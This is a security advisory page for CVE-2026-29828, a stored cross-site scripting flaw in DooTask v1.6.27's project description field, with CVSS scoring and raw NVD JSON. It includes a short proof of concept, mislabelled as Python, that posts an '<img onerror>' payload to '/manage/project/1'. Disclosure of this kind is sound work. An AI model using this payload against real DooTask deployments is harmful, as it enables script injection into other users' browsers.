Security Vulnerability Report
中文
CVE-2026-29828 CVSS 6.1 MEDIUM

CVE-2026-29828

Published: 2026-03-20 17:16:59
Last Modified: 2026-04-02 20:12:51

Description

DooTask v1.6.27 has a Cross-Site Scripting (XSS) vulnerability in the /manage/project/<id> page via the input field projectDesc.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:dootask:dootask:*:*:*:*:*:*:*:* - VULNERABLE
DooTask 1.6.27

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2026-29828 // Target: DooTask v1.6.27 // Vulnerable Parameter: projectDesc // 1. Define the malicious payload to test XSS var payload = '<img src=x onerror=alert(1)>'; // 2. Send a POST request to inject the payload into the project description fetch('/manage/project/1', { method: 'POST', headers: { 'Content-Type': 'application/json', // Include authentication cookies if required }, body: JSON.stringify({ 'projectDesc': payload, // Other necessary parameters for the update request }) }).then(response => console.log('Payload injected')); // 3. Navigate to the project page to verify the execution // Visiting /manage/project/1 should trigger the alert box.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29828", "sourceIdentifier": "[email protected]", "published": "2026-03-20T17:16:58.527", "lastModified": "2026-04-02T20:12:50.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DooTask v1.6.27 has a Cross-Site Scripting (XSS) vulnerability in the /manage/project/<id> page via the input field projectDesc."}, {"lang": "es", "value": "DooTask v1.6.27 tiene una vulnerabilidad de cross-site scripting (XSS) en la página /manage/project/ a través del campo de entrada projectDesc."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dootask:dootask:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.6.27", "matchCriteriaId": "792933D7-5C54-4088-AA7C-B4FAC8EEDDAD"}]}]}], "references": [{"url": "https://github.com/J4cky1028/vulnerability-research/tree/main/CVE-2026-29828", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/kuaifan/dootask", "source": "[email protected]", "tags": ["Product"]}]}}